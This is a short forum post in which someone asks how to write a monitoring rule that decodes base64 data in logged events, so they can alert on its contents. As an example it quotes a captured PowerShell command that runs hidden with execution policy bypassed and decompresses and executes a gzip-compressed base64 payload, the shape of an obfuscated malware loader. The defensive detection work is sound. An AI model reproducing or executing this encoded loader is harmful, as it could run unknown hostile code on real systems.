Decode base64 data from events

Hello, everyone, Hope to find an answer here. I am having some events with some base64 encoded data within them. I would like to write a rule which will decode the base64 command, in order to create a more complex alerting rule, based on the content of that base64 command. Below is an example (Only a small part, the encoded part of the event): Host Application = powershell.exe -nop -w hidden -noni -ep bypass &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAIkmi10CA51WXW/iRhR951dcUXexFTwiqPsSKauyTraNlO6ihTYPCCmDfQluzAydGfOhhP/eO/YYm5Bom/oB8Mydc88992P4CYZyg2qeCwjhTqXGoIDZDj7T1zhXAhV8gCu+Rvidq2TXapFlbFIp4Dc04R3O4ixFYaD11AJ6vE0Ml/AVN+G32d8YGwjHuxV+5UukRcPIPirsK2P2p8YrnPM8M5HChHZSnmmC8IzK8WA1VHK7Yy8saL2xUtm29jXFVRVa6wmK/SFXfOmXvycjo1LxMPUiuVxykXSPV0c6i6V4sXglNyKTPClWA4epZIxagxNgKZM8Q0vwVz+A0iSdg1+5gRD/gfYsFUk7KDbLc8XZLNUkP0l+SS539HvJrGojGT+i0Wwcr26dxfQXek4PMm24Mtav81zsuhRdNuwGcYwrQ4BlOvySyv4tugrXqDSeMj5AN1L+GvNo6By1z3vsY5/R53m/3bVRONetUj5tFPKl5VpCMyqzUbFGHGt2ZXZKcrZS2i4ZDWpaZ6MK7A12GOdU8Ts2qkx957/rzamksOs/eWNC30PINUyOznzHpTQYoTLpPI25wb94libc1l3Es2zG48dpELxChw1ys7BFaw8N9Gu6BI3k1YLUATUVm8x2BifTqWe/bdn1GOv36Hn++am3d6KiSKptf2JwaxiKWCa2pi8uBqPo5iawQn+2Nn77jopTbnQ5GUYLzDJQuRBkDSRDrqlA23AGHor1hX0Ttr3PaI0yctiI5XKVm3rzXkRytVPpw8KAHwXQ751/hD/SWEkt5wYiqVZSFfIxGFiP1lKDQnKwxoTdi3vh6s9pwuy4Qr+Ortvr1i/sFsWDWTSLpureZtmcVM37pJqcTeGWIK02rvPZgef7uVanvkh1zeMFcS5BIRWHyVJb1bTt4x8N5IBV0Zazq0IKnm/EWj5ieL1dkbaa9D6g7I878V1KdIYj6FCeCxa3Mi4yGbAhNwta7Xzq/O/UbRZphr7vpUUPlMe/I0/8suK70OuCd3QugFAg9E5ye23pYzKmUN66pNx0sCasCPHahVyjUI9zS6WB5oZUIXMVDnhp8KKsaCRYLU8SAGE1bEvw/qcP5/AM33ITlqjgpDiC6kMhSAVMIv8gBdCpQbaWiIdKSTXpTY+cNVgX+yzOkCs/eI3BZfOFGn/bOu2k/1Q+NcwPW6dZKieNU535kuV6cbh/3Rh0N0qUSY0unvpGHBm5qq5B+g/ROvx3OCTHXYIQusvHDpB/ARsf0bc/CQAA'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) I would like to have a rule which will decode the encoded data in order to create the final alerting rule. I am curious, how you can accomplish that? Many thanks in advance!